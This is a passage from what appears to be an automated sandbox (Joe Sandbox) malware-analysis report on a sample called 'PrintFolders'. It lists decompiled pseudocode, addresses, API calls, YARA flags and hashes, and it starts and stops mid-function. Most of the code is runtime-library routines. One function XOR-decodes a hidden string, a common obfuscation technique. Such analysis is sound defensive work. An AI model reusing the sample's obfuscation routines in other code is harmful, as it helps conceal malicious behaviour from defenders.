							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E10008701( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E10008701(_t283);
						goto L31;
					}
				} else {
					_t219 = E10006406(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E1000632C();
					L31:
					return _t297;
				}
				L81:
			}

0x100093b3
0x100093b6
0x100093b9
0x100093ba
0x100093bc
0x100093d2
0x100093d6
0x100093d9
0x100093db
0x100093dd
0x100093df
0x100093e1
0x100093e4
0x100093e7
0x100093ea
0x100093ec
0x1000944f
0x10009451
0x10009454
0x10009456
0x1000945a
0x10009463
0x10009464
0x10009467
0x10009469
0x1000946c
0x10009470
0x10009470
0x10009472
0x10009474
0x10009476
0x10009478
0x10009478
0x1000947a
0x1000947d
0x10009480
0x10009480
0x10009482
0x10009483
0x10009483
0x1000948e
0x10009490
0x10009493
0x10009494
0x10009497
0x10009497
0x1000949b
0x1000949e
0x100094a1
0x100094a1
0x100094a1
0x100094ae
0x100094b0
0x100094b3
0x100094b5
0x100094cd
0x100094d0
0x100094d3
0x100094d5
0x100094d8
0x100094da
0x100094dd
0x100094e0
0x1000953d
0x10009540
0x10009543
0x10009545
0x00000000
0x100094e2
0x100094e4
0x100094e4
0x100094e6
0x100094e9
0x100094e9
0x100094eb
0x100094ed
0x100094f3
0x100094f6
0x100094f6
0x100094f8
0x100094f9
0x100094f9
0x10009500
0x10009503
0x10009507
0x10009514
0x10009519
0x1000951c
0x1000951e
0x10009592
0x10009593
0x10009594
0x10009595
0x10009596
0x10009597
0x1000959c
0x100095a0
0x100095a2
0x100095a3
0x100095a6
0x100095a6
0x100095a9
0x100095a9
0x100095ab
0x100095ac
0x100095ac
0x100095b0
0x100095b1
0x100095b8
0x100095bb
0x100095be
0x100095c0
0x100095c8
0x100095c9
0x100095ca
0x100095cd
0x100095d7
0x100095db
0x100095dd
0x100095f1
0x100095f1
0x100095f4
0x100095fe
0x10009603
0x10009606
0x10009608
0x00000000
0x1000960a
0x1000960a
0x1000960f
0x10009616
0x10009619
0x1000961b
0x1000962c
0x1000962e
0x10009630
0x10009630
0x10009630
0x1000961d
0x1000961e
0x10009623
0x10009626
0x10009635
0x1000963b
0x00000000
0x1000963e
0x100095df
0x100095df
0x100095e5
0x100095ea
0x100095ed
0x100095ef
0x10009641
0x10009643
0x10009644
0x10009645
0x10009646
0x10009647
0x10009648
0x1000964d
0x10009650
0x10009651
0x10009653
0x10009659
0x10009660
0x10009663
0x10009666
0x10009669
0x1000966a
0x1000966b
0x1000966e
0x10009674
0x10009676
0x10009678
0x10009678
0x1000967a
0x1000967c
0x00000000
0x00000000
0x1000967e
0x10009680
0x10009682
0x10009684
0x1000968f
0x10009691
0x10009693
0x00000000
0x00000000
0x10009693
0x10009684
0x00000000
0x10009680
0x10009695
0x10009695
0x1000969b
0x1000969d
0x100096a3
0x100096a5
0x100096c7
0x100096c7
0x100096c9
0x100096cb
0x100096d7
0x100096d7
0x100096cd
0x100096cd
0x100096cf
0x00000000
0x100096d1
0x100096d1
0x100096d3
0x100096d5
0x00000000
0x00000000
0x100096d5
0x100096cf
0x100096df
0x100096e7
0x100096ed
0x100096ee
0x100096f0
0x100096f8
0x100096fe
0x10009704
0x1000970a
0x1000971e
0x10009723
0x1000972e
0x1000973e
0x10009744
0x10009746
0x10009749
0x1000976c
0x1000976c
0x10009771
0x10009777
0x10009777
0x1000977d
0x10009783
0x10009789
0x1000978f
0x10009795
0x100097b6
0x100097bb
0x100097c0
0x100097c4
0x100097ca
0x100097cd
0x100097e0
0x100097e0
0x100097e6
0x100097ec
0x100097ed
0x100097ee
0x100097f3
0x100097f6
0x100097fc
0x100097fe
0x1000985c
0x10009862
0x1000986a
0x1000986f
0x10009875
0x10009876
0x00000000
0x00000000
0x00000000
0x100097cf
0x100097cf
0x100097d2
0x100097d4
0x00000000
0x100097d6
0x100097d6
0x100097d9
0x00000000
0x100097db
0x100097db
0x100097de
0x00000000
0x00000000
0x00000000
0x00000000
0x100097de
0x100097d9
0x100097d4
0x10009878
0x10009879
0x00000000
0x10009800
0x10009800
0x10009806
0x1000980e
0x10009813
0x10009822
0x10009822
0x1000982a
0x10009830
0x10009836
0x1000983d
0x10009840
0x10009842
0x10009852
0x10009857
0x00000000
0x1000974b
0x1000974b
0x10009751
0x10009752
0x10009753
0x10009754
0x1000975c
0x1000975c
0x1000987f
0x1000987f
0x10009886
0x10009887
0x1000988f
0x10009894
0x10009895
0x100096a7
0x100096a7
0x100096aa
0x100096ac
0x100096c1
0x00000000
0x100096ae
0x100096ae
0x100096b1
0x100096b2
0x100096b3
0x100096b4
0x100096b9
0x100096ac
0x1000989a
0x1000989b
0x1000989d
0x100098a4
0x00000000
0x00000000
0x00000000
0x100095ef
0x100095c2
0x100095c4
0x100095c5
0x100095c7
0x100095c7
0x00000000
0x00000000
0x00000000
0x00000000
0x10009520
0x10009520
0x10009526
0x10009529
0x1000952c
0x1000952f
0x10009532
0x10009535
0x10009538
0x10009538
0x00000000
0x100094e9
0x100094b7
0x100094b7
0x100094ba
0x10009547
0x10009548
0x1000954d
0x00000000
0x1000954d
0x100093ee
0x100093ee
0x100093f1
0x100093f9
0x100093fc
0x10009403
0x10009405
0x10009407
0x10009422
0x10009423
0x10009424
0x10009425
0x1000942a
0x1000942d
0x10009430
0x10009409
0x10009409
0x1000940c
0x1000940d
0x1000940e
0x1000940f
0x10009410
0x10009415
0x10009417
0x1000941a
0x1000941a
0x10009432
0x10009434
0x00000000
0x00000000
0x1000943d
0x10009440
0x10009443
0x10009445
0x10009447
0x00000000
0x10009449
0x10009449
0x1000944c
0x00000000
0x1000944c
0x00000000
0x10009447
0x100094c2
0x1000954e
0x10009551
0x10009555
0x1000955e
0x10009561
0x10009565
0x10009565
0x10009567
0x1000956a
0x1000956c
0x1000956e
0x10009570
0x10009575
0x10009576
0x1000957a
0x1000957a
0x1000957e
0x10009581
0x10009581
0x10009585
0x00000000
0x1000958c
0x100093be
0x100093be
0x100093c5
0x100093c6
0x100093c8
0x1000958d
0x10009591
0x10009591
0x00000000

APIs

_free.LIBCMT ref: 10009548

Strings

*?, xrefs: 100093F1

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 72a3e4ca702a8c4f9c99998b4a73be40bf4d94a3e87db8c17ad137306030f0af
Instruction ID: 0340fc811119e07594000e71e8d06bdc8eabf6b4f8489cd8c2a7edce7445303f
Opcode Fuzzy Hash: 72a3e4ca702a8c4f9c99998b4a73be40bf4d94a3e87db8c17ad137306030f0af
Instruction Fuzzy Hash: E0617EB5E0021A9FEB14CFA9C8819DDFBF5FF48390B25816AE815F7344D631AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 004416CB Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00441865

Strings

*?, xrefs: 0044170E

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 76b620e72b1dbb4dfcec853c55e4519de0bd11c3334c3aa31fb4d74e4a998a5d
Instruction ID: 94cf888e9de60d1963efd33ec482e46fa66187b9afba07f34032ac2584db377d
Opcode Fuzzy Hash: 76b620e72b1dbb4dfcec853c55e4519de0bd11c3334c3aa31fb4d74e4a998a5d
Instruction Fuzzy Hash: 1F613075E002199FEF14DFA9C8815EEFBF5EF48314B24816AE815F7310E6359E818B94

Uniqueness

Uniqueness Score: -1.00%

Function 00421875 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E00421875(void* __eflags, intOrPtr _a4, int _a8, intOrPtr _a12, intOrPtr _a16, short* _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v28;
				char _v32;
				void* _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t36;
				signed int _t40;
				int _t43;
				intOrPtr _t55;
				int _t56;
				short* _t57;
				signed int _t58;
				void* _t59;
				short* _t60;

				_t30 =  *0x43d054; // 0x7bd02ead
				_v8 = _t30 ^ _t58;
				E00413621( &_v32, _t55, _a4);
				_t48 = _a24;
				if(_a24 == 0) {
					_t48 =  *((intOrPtr*)(_v28 + 8));
				}
				_t56 = 0;
				_t36 = E0041FE48(_t48, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_t60 = _t59 + 0x18;
				_v16 = _t36;
				if(_t36 == 0) {
					L16:
					if(_v20 != 0) {
						 *(_v32 + 0x350) =  *(_v32 + 0x350) & 0xfffffffd;
					}
					return E0040EBBF(_t56, _t48, _v8 ^ _t58, _t55, _t56, _t57);
				} else {
					_t55 = _t36 + _t36;
					_v12 = _t55;
					asm("sbb eax, eax");
					_t40 = _t36 & _t55 + 0x00000008;
					if(_t40 == 0) {
						_t57 = 0;
						L12:
						if(_t57 != 0) {
							E00410B00(_t56, _t57, _t56, _t55);
							_t43 = E0041FE48(_t48, 1, _a12, _a16, _t57, _v16);
							if(_t43 != 0) {
								_t56 = GetStringTypeW(_a8, _t57, _t43, _a20);
							}
						}
						E0040EBA1(_t57);
						goto L16;
					}
					if(_t40 > 0x400) {
						_t57 = E0041ED2F(_t40);
						if(_t57 == 0) {
							L10:
							_t55 = _v12;
							goto L12;
						}
						 *_t57 = 0xdddd;
						L9:
						_t57 =  &(_t57[4]);
						goto L10;
					}
					E0040F580(_t40);
					_t57 = _t60;
					if(_t57 == 0) {
						goto L10;
					}
					 *_t57 = 0xcccc;
					goto L9;
				}
			}

0x0042187d
0x00421884
0x00421890
0x00421895
0x0042189a
0x0042189f
0x0042189f
0x004218a4
0x004218bd
0x004218c2
0x004218c5
0x004218ca
0x00421954
0x00421958
0x0042195d
0x0042195d
0x00421977
0x004218d0
0x004218d0
0x004218d6
0x004218db
0x004218dd
0x004218df
0x00421916
0x00421918
0x0042191a
0x0042191f
0x00421931
0x0042193b
0x0042194b
0x0042194b
0x0042193b
0x0042194e
0x00000000
0x00421953
0x004218e6
0x00421901
0x00421906
0x00421911
0x00421911
0x00000000
0x00421911
0x00421908
0x0042190e
0x0042190e
0x00000000
0x0042190e
0x004218e8
0x004218ed
0x004218f1
0x00000000
0x00000000
0x004218f3
0x00000000
0x004218f3

APIs

__alloca_probe_16.LIBCMT ref: 004218E8
GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,0000FDE9), ref: 00421945
__freea.LIBCMT ref: 0042194E

Part of subcall function 0041ED2F: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040FF9B,?,?,?,?,?,00403757,?,?,?), ref: 0041ED61

Strings

tIB, xrefs: 00421888

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: AllocateHeapStringType__alloca_probe_16__freea
String ID: tIB
API String ID: 2035984020-366005614
Opcode ID: eda957cfb15ef7941afacb619c8722be3406a97b873fedbfb145e6bb9f7ac986
Instruction ID: e53cbf2fbd7e5de764d6e10ddde7606d24dd4c66cd89eb36cbd394391ca5fa72
Opcode Fuzzy Hash: eda957cfb15ef7941afacb619c8722be3406a97b873fedbfb145e6bb9f7ac986
Instruction Fuzzy Hash: A831D2B1A0022AABDB209F66DC41DEF7BB5EF54314F45416AFC04A7261D738C991CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004012E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E004012E0(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				short _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebp;
				signed int _t11;
				intOrPtr _t14;
				intOrPtr _t15;
				void* _t19;
				void* _t24;
				intOrPtr* _t26;
				void* _t31;
				void* _t32;
				void* _t33;
				signed int _t34;
				void* _t35;

				_t33 = __esi;
				_t32 = __edi;
				_t24 = __ebx;
				_t11 =  *0x43d054; // 0x7bd02ead
				_v8 = _t11 ^ _t34;
				_v20 = 0x5c4f5c4c;
				_v16 = 0x465e0057;
				_v12 = 0x2e5e;
				_t25 =  *((intOrPtr*)( *[fs:0x2c]));
				_t14 =  *0x450fcc; // 0x80000004
				if(_t14 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
					E0040EF48(_t14, 0x450fcc);
					_t35 = _t35 + 4;
					_t38 =  *0x450fcc - 0xffffffff;
					if( *0x450fcc == 0xffffffff) {
						asm("movaps xmm0, [0x439d50]");
						asm("movups [0x450d48], xmm0");
						asm("movq xmm0, [ebp-0x10]");
						asm("movq [0x450d58], xmm0");
						 *0x450d60 = _v12;
						E0040F25B(_t25, _t38, 0x42d270);
						E0040EEFE(0x450fcc);
						_t35 = _t35 + 8;
					}
				}
				if( *0x450d61 == 0) {
					L6:
					_t26 = 0x450d48;
					 *0x450e6c = 0;
					 *0x450e7c = 0;
					 *0x450e80 = 0xf;
					_t9 = _t26 + 1; // 0x450d49
					_t31 = _t9;
					do {
						_t15 =  *_t26;
						_t26 = _t26 + 1;
						_t41 = _t15;
					} while (_t15 != 0);
					E004026B0(_t24, 0x450e6c, 0x450d48, _t26 - _t31);
					return E0040EBBF(E0040F25B(0x450e6c, _t41, 0x42d210), _t24, _v8 ^ _t34, _t31, _t32, _t33);
				} else {
					asm("movups xmm0, [0x450d48]");
					_t19 = 0x10;
					asm("movaps xmm1, [0x439d30]");
					asm("pxor xmm1, xmm0");
					asm("movups [0x450d48], xmm1");
					do {
						 *(_t19 + 0x450d48) =  *(_t19 + 0x450d48) ^ 0x0000002e;
						_t19 = _t19 + 1;
					} while (_t19 < 0x1a);
					goto L6;
				}
			}

0x004012e0
0x004012e0
0x004012e0
0x004012e6
0x004012ed
0x004012f6
0x004012fd
0x00401304
0x0040130a
0x0040130c
0x00401317
0x0040131e
0x00401323
0x00401326
0x0040132d
0x0040132f
0x0040133a
0x00401346
0x0040134b
0x00401353
0x00401359
0x00401363
0x00401368
0x00401368
0x0040132d
0x00401372
0x0040139f
0x0040139f
0x004013a4
0x004013ae
0x004013b8
0x004013c2
0x004013c2
0x004013c5
0x004013c5
0x004013c7
0x004013c8
0x004013c8
0x004013d9
0x004013f8
0x00401374
0x00401374
0x0040137b
0x00401380
0x00401387
0x0040138b
0x00401392
0x00401392
0x00401399
0x0040139a
0x00000000
0x00401392

APIs

Part of subcall function 0040EF48: EnterCriticalSection.KERNEL32(004504FC,00450D8D,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF53
Part of subcall function 0040EF48: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF90

__Init_thread_footer.LIBCMT ref: 00401363

Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2

Strings

L\O\, xrefs: 004012F6
W, xrefs: 004012FD
^., xrefs: 00401304

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: L\O\$W$^.
API String ID: 2296764815-2954420958
Opcode ID: 466d19772e7674810153093e6f61bbe3c851cf9c15c590cddcd6ca1366938e27
Instruction ID: ee1b09ab654b966cb7d5fff89a1237d5bce974de8ca2d720cb455b5a0ca2e737
Opcode Fuzzy Hash: 466d19772e7674810153093e6f61bbe3c851cf9c15c590cddcd6ca1366938e27
Instruction Fuzzy Hash: 8321243890074486E710AFB4EC4776D7370BF45309F24867AD8492A6F3E7B9A588CB4C

Uniqueness

Uniqueness Score: -1.00%

Function 100049CA Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E100049CA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x10015860);
				E10003C50(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E10005BC0(_t107, E1000435B(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E10005BC0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x10017cd4; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x10010164();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E100076E4(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x10015880);
									E10003C50(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E100049CA(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E100056CA(_t103, _t108[0x18], E1000435B( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E100056DA(_t103, _t108[0x18], E1000435B( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E1000435B();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x100049ca
0x100049cc
0x100049d1
0x100049d6
0x100049d8
0x100049db
0x100049e0
0x10004af0
0x10004af0
0x10004af0
0x00000000
0x100049ef
0x100049ef
0x100049f4
0x100049fe
0x10004a00
0x10004a05
0x10004a0a
0x10004a0a
0x10004a0c
0x10004a0f
0x10004a14
0x10004a36
0x10004a36
0x10004a39
0x10004a3c
0x10004a5a
0x10004a5d
0x10004a9c
0x10004a9f
0x10004aa2
0x10004ac7
0x10004ac9
0x00000000
0x10004acb
0x10004acb
0x10004acd
0x00000000
0x10004acf
0x10004acf
0x10004ad4
0x10004ad8
0x10004ad8
0x10004ad9
0x00000000
0x10004ad9
0x10004acd
0x10004aa4
0x10004aa4
0x10004aa6
0x00000000
0x10004aa8
0x10004aa8
0x10004aaa
0x00000000
0x10004aac
0x10004abd
0x00000000
0x10004ac2
0x10004aaa
0x10004aa6
0x10004a5f
0x10004a5f
0x10004a63
0x00000000
0x10004a69
0x10004a69
0x10004a6b
0x00000000
0x10004a71
0x10004a78
0x10004a80
0x10004a84
0x10004a86
0x10004a89
0x10004a8e
0x10004a8f
0x00000000
0x10004a8f
0x10004a89
0x00000000
0x10004a84
0x10004a6b
0x10004a63
0x10004a3e
0x10004a3e
0x00000000
0x10004a3e
0x10004a1b
0x10004a1b
0x10004a20
0x10004a25
0x00000000
0x10004a27
0x10004a29
0x10004a32
0x10004a41
0x10004a43
0x10004b02
0x10004b02
0x10004b07
0x10004b08
0x10004b0a
0x10004b0f
0x10004b14
0x10004b17
0x10004b1a
0x10004b1d
0x10004b26
0x10004b26
0x10004b1f
0x10004b1f
0x10004b1f
0x10004b29
0x10004b2d
0x10004b30
0x10004b31
0x10004b32
0x10004b33
0x10004b36
0x10004b3f
0x10004b3f
0x10004b42
0x10004b78
0x10004b44
0x10004b44
0x10004b44
0x10004b47
0x10004b5e
0x10004b5e
0x10004b47
0x10004b7d
0x10004b87
0x10004b93
0x10004a51
0x10004a51
0x10004a56
0x10004a57
0x10004a91
0x10004a98
0x10004adc
0x10004adc
0x10004ae3
0x10004af2
0x10004af5
0x10004b01
0x10004b01
0x10004a43
0x10004a25
0x00000000
0x00000000
0x00000000
0x100049f4

APIs

___AdjustPointer.LIBCMT ref: 10004A91
___AdjustPointer.LIBCMT ref: 10004AB4
___AdjustPointer.LIBCMT ref: 10004B50

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: d7e06759a182467ecbddfc5be9e71537fdf669dd7d98f9716886f151031a7616
Instruction ID: c86ceda4d1325f0568557c1dae7b0478574bf977d686f1191d636807e4b9891e
Opcode Fuzzy Hash: d7e06759a182467ecbddfc5be9e71537fdf669dd7d98f9716886f151031a7616
Instruction Fuzzy Hash: 5D5103B6A04606AFFB18CF50C841B6A77A4EF403D1F12412DED0687199EF32EC40C799

Uniqueness

Uniqueness Score: -1.00%

Function 00411EBB Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 67%

			E00411EBB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x43b8f8);
				E0040F9E0(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E004104C0(_t107, E0041011F(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E004104C0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x450568; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x42e234();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E00419C49(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x43b918);
									E0040F9E0(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
